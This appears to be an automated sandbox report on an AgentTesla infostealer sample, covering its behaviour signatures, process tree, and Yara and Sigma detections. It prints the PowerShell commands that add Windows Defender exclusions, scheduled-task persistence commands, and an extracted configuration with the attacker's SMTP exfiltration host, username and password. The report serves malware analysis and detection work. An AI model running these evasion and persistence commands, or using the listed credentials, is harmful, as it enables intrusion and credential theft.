Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Analysis ID:	1391079
MD5:	2d291baedb79ee55daa67417103f0905
SHA1:	810f2f9576976b3e68a610fbe2797b148c82766c
SHA256:	0df39b8c26a1b395b2389908f7dc4781aabba0aa10f4642baf46b8f1a9e2c426
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe (PID: 5244 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)

powershell.exe (PID: 6984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5332 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7424 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5060 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe (PID: 7276 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)

lnYkIr.exe (PID: 7344 cmdline: C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)

schtasks.exe (PID: 7656 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lnYkIr.exe (PID: 7708 cmdline: C:\Users\user\AppData\Roaming\lnYkIr.exe MD5: 2D291BAEDB79EE55DAA67417103F0905)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "laju.varghese@grupocatqla.com", "Password": ")Ivlmuj5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: lnYkIr.exe PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lnYkIr.exe PID: 7344	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lnYkIr.exe PID: 7344	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: lnYkIr.exe PID: 7708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lnYkIr.exe PID: 7708	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x321c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32235:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x322bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32351:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x323bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3242d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x324c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32553:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.lnYkIr.exe.441fa30.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.lnYkIr.exe.441fa30.11.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.lnYkIr.exe.441fa30.11.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x321c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32235:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x322bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32351:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x323bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3242d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x324c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32553:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
14.2.lnYkIr.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33fc3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34035:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x340bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34151:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x341bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3422d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x342c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34353:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x321c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32235:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x322bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32351:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x323bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3242d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x324c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32553:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.lnYkIr.exe.445b050.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.lnYkIr.exe.445b050.12.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.lnYkIr.exe.445b050.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.lnYkIr.exe.445b050.12.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.lnYkIr.exe.445b050.12.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.lnYkIr.exe.445b050.12.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x321c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32235:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x322bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32351:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x323bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3242d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x324c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32553:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.lnYkIr.exe.445b050.12.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33fc3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f3e3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34035:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f455:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x340bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f4df:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34151:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f571:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x341bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f5db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3422d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f64d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x342c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f6e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34353:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f773:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.lnYkIr.exe.441fa30.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.lnYkIr.exe.441fa30.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.lnYkIr.exe.441fa30.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.lnYkIr.exe.441fa30.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33fc3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f5e3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaaa03:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34035:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f655:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa75:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x340bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f6df:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaaff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34151:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f771:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab91:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x341bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f7db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaabfb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3422d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f84d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac6d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x342c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f8e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaad03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33fc3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f5e3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaaa03:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34035:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f655:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa75:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x340bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f6df:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaaff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34151:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f771:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab91:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x341bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f7db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaabfb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3422d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f84d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac6d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x342c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f8e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaad03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33fc3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f3e3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34035:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f455:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x340bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f4df:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34151:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f571:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x341bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f5db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3422d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f64d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x342c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f6e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34353:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f773:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessId: 6984, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lnYkIr.exe, ParentImage: C:\Users\user\AppData\Roaming\lnYkIr.exe, ParentProcessId: 7344, ParentProcessName: lnYkIr.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmp, ProcessId: 7656, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, Initiated: true, ProcessId: 7276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49729

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, ProcessId: 5060, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessId: 6984, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ParentProcessId: 5244, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmp, ProcessId: 5060, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack

